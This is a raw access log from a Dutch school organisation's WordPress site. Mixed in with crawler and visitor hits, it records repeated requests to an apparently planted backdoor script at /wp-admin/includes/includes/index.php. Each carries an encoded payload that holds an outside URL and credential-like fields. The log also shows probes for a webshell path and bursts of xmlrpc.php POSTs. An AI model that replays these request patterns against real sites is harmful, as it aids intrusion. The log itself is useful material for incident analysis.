2001:1690:2:4::1:118 - - [26/Jul/2026:20:16:48 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333430382p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353038393830382q6463343762326461303032643336386664626134343661333864383765656337222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
111.92.145.61 - - [26/Jul/2026:20:17:51 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.4)"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:18:02 +0200] "POST /wp-cron.php?doing_wp_cron=1785089882.3062539100646972656250 HTTP/1.1" 200 5522 "-" "WordPress/6.7.5; https://cso-apeldoorn.nl"
111.92.145.61 - - [26/Jul/2026:20:18:02 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "Jetpack by WordPress.com"
111.92.145.61 - - [26/Jul/2026:20:18:13 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "WordPress.com; https://wordpress.com"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:17:17 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333433372p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353038393833372q3661336534373637396239333232333834363631323265626530626138353663222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
111.92.145.61 - - [26/Jul/2026:20:18:24 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.4)"
111.92.145.61 - - [26/Jul/2026:20:18:36 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "WordPress.com; https://wordpress.com"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:17:43 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333436332p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353038393836332q3034303166663531346333343730393430323632383330353533663332663664222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
111.92.145.61 - - [26/Jul/2026:20:18:47 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "WordPress.com; https://wordpress.com"
111.92.145.61 - - [26/Jul/2026:20:18:58 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "Jetpack/12.1; WordPress/6.4; http://site82763797.com"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:18:05 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333438352p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353038393838352q3666376635353339306266346163383966653866656435636563393130356463222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
111.92.145.61 - - [26/Jul/2026:20:19:08 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "Jetpack by WordPress.com"
111.92.145.61 - - [26/Jul/2026:20:19:19 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "WordPress.com; https://wordpress.com"
111.92.145.61 - - [26/Jul/2026:20:19:29 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "WordPress.com; https://wordpress.com"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:18:31 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333531312p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353038393931312q6164336232353734393238336238336537323764663839303462383030393539222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
111.92.145.61 - - [26/Jul/2026:20:19:40 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.3)"
111.92.145.61 - - [26/Jul/2026:20:19:51 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "Jetpack by WordPress.com"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:18:54 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333533342p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353038393933342q3066626361633637653664323263666664666431373566336333336630623832222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
111.92.145.61 - - [26/Jul/2026:20:20:01 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "Jetpack by WordPress.com"
111.92.145.61 - - [26/Jul/2026:20:20:12 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "Jetpack by WordPress.com"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:19:17 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333535372p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353038393935372q3739313664316130626332343932386462393037633633376231393739303032222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
34.14.22.217 - - [26/Jul/2026:20:20:21 +0200] "GET /robots.txt HTTP/1.1" 200 5588 "-" "DnBCrawler-Analytics"
111.92.145.61 - - [26/Jul/2026:20:20:23 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "Jetpack/12.1; WordPress/6.2; http://site73689546.com"
34.14.22.217 - - [26/Jul/2026:20:20:21 +0200] "GET / HTTP/1.1" 301 5556 "-" "DnBCrawler-Analytics"
34.14.22.217 - - [26/Jul/2026:20:20:24 +0200] "GET / HTTP/1.1" 200 59098 "-" "DnBCrawler-Analytics"
34.14.22.217 - - [26/Jul/2026:20:20:27 +0200] "GET /robots.txt HTTP/1.1" 200 5588 "-" "DnBCrawler-Analytics"
34.14.22.217 - - [26/Jul/2026:20:20:27 +0200] "GET /identiteit/ HTTP/1.1" 200 56032 "-" "DnBCrawler-Analytics"
34.14.22.217 - - [26/Jul/2026:20:20:29 +0200] "GET /onze-scholen/ HTTP/1.1" 200 60641 "-" "DnBCrawler-Analytics"
34.14.22.217 - - [26/Jul/2026:20:20:31 +0200] "GET /autisme-steunpunt-apeldoorn/ HTTP/1.1" 200 43197 "-" "DnBCrawler-Analytics"
111.92.145.61 - - [26/Jul/2026:20:20:33 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "Jetpack by WordPress.com (Jetpack 13.0; WordPress 6.2)"
34.14.22.217 - - [26/Jul/2026:20:20:33 +0200] "GET /contact/ HTTP/1.1" 200 52574 "-" "DnBCrawler-Analytics"
34.14.22.217 - - [26/Jul/2026:20:20:35 +0200] "GET /beleid/ HTTP/1.1" 200 46378 "-" "DnBCrawler-Analytics"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:19:40 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333538302p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353038393938302q3265333436663737346537326332326136336437613366633263323862666235222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
34.14.22.217 - - [26/Jul/2026:20:20:38 +0200] "GET /gmr-platform/ HTTP/1.1" 200 51379 "-" "DnBCrawler-Analytics"
34.14.22.217 - - [26/Jul/2026:20:20:40 +0200] "GET /rvt/ HTTP/1.1" 200 58798 "-" "DnBCrawler-Analytics"
111.92.145.61 - - [26/Jul/2026:20:20:44 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "Jetpack by WordPress.com"
34.14.22.217 - - [26/Jul/2026:20:20:42 +0200] "GET /vacatures/ HTTP/1.1" 200 46594 "-" "DnBCrawler-Analytics"
34.14.22.217 - - [26/Jul/2026:20:20:44 +0200] "GET /actueel/ HTTP/1.1" 200 64697 "-" "DnBCrawler-Analytics"
34.14.22.217 - - [26/Jul/2026:20:20:47 +0200] "GET /author/jacinta/ HTTP/1.1" 200 35647 "-" "DnBCrawler-Analytics"
111.92.145.61 - - [26/Jul/2026:20:20:54 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "Jetpack by WordPress.com"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:20:03 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333630332p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353039303030332q3735376135306365653632656161643937303530326362396437626635616637222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
111.92.145.61 - - [26/Jul/2026:20:21:05 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.1)"
111.92.145.61 - - [26/Jul/2026:20:21:15 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "Jetpack by WordPress.com"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:20:26 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333632362p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353039303032362q3233643738313361313530306462333137313162653163666130303066666536222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
111.92.145.61 - - [26/Jul/2026:20:21:26 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "Jetpack by WordPress.com"
111.92.145.61 - - [26/Jul/2026:20:21:37 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "Jetpack by WordPress.com"
111.92.145.61 - - [26/Jul/2026:20:21:47 +0200] "POST /xmlrpc.php HTTP/1.1" 200 6090 "-" "Jetpack/13.0; WordPress/6.4; http://site33105093.com"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:20:48 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333634382p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353039303034382q3839663533366135333938383161653038346165313736373836646330393662222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:21:11 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333637312p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353039303037312q3137343836633234616362643663376430356330643337336631616237343732222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:21:33 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333639332p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353039303039332q3639616532383633623361643235346363393039323764373966323638663034222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:21:56 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333731362p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353039303131362q3631646262386637316533653065356566386466333663336537613532303435222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:22:18 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333733382p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353039303133382q6539343765353532333939343335343934363039306236636535653833343332222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:22:41 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333736312p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353039303136312q3833623233313335393766626361306234316363646362386261393866656565222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:23:03 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333738332p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353039303138332q3363623161333461313336363330623661356438633333643162373037306166222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:23:25 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333830352p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353039303230352q6665313039366432653765636262376436333933366131356436613330386537222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
1.13.158.23 - - [26/Jul/2026:20:24:28 +0200] "GET / HTTP/1.1" 200 59414 "http://cso-apeldoorn.nl" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:23:47 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333832372p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353039303232372q3563633665643635616233363766393835393433356439353366343162336233222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:24:09 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333834392p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353039303234392q6238663365363833366138646439363634633861623162376662616166306236222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:24:31 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333837312p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353039303237312q3461643830393066323161383639353634363431383732343564393230653363222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:24:54 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333839342p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353039303239342q3837656662313030643761386532636632656230386632636532653334383763222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:25:16 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333931362p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353039303331362q3735393335363961303634393336643833303765626533333934333865346131222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
74.7.175.190 - - [26/Jul/2026:20:26:33 +0200] "GET /robots.txt HTTP/1.1" 200 5588 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.4; robots.txt; +https://openai.com/searchbot"
74.7.227.50 - - [26/Jul/2026:20:26:33 +0200] "GET / HTTP/1.1" 301 5556 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:25:37 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333933372p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353039303333372q3661346533323662323733323966336633643165633331306530613164306531222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
2001:1690:2:4::1:118 - - [26/Jul/2026:20:25:58 +0200] "GET /wp-admin/includes/includes/index.php?ARRAY=7o2230223n313738353039333935382p2231223n22687474703n5p2s5p2s7n733931387631332r6r696369616r2r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313738353039303335382q6533653131346132616231373830663261613734303261343635373865313532222p2232223n223265623065633265386536313938303430626464656435353165616639366533222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34382q35352q36372q37322q38372q3330227q HTTP/1.1" 504 5670 "-" "-"
74.125.151.38 - - [26/Jul/2026:20:27:00 +0200] "GET / HTTP/1.1" 200 272503 "-" "Google-Edu"
172.202.44.182 - - [26/Jul/2026:20:27:09 +0200] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 38728 "http://cso-apeldoorn.nl/wp-content/plugins/fix/up.php" "Mozilla/5.0"
172.202.44.182 - - [26/Jul/2026:20:27:10 +0200] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 38728 "-" "Mozilla/5.0"
74.125.151.38 - - [26/Jul/2026:20:27:10 +0200] "GET /shop/js/cart.aspx?_=1785090419375 HTTP/1.1" 200 224241 "https://cso-apeldoorn.nl/" "Google-Edu"
74.125.151.38 - - [26/Jul/2026:20:27:10 +0200] "GET /shop/js/menumystoreajax.aspx?_=1785090419376 HTTP/1.1" 200 214771 "https://cso-apeldoorn.nl/" "Google-Edu"
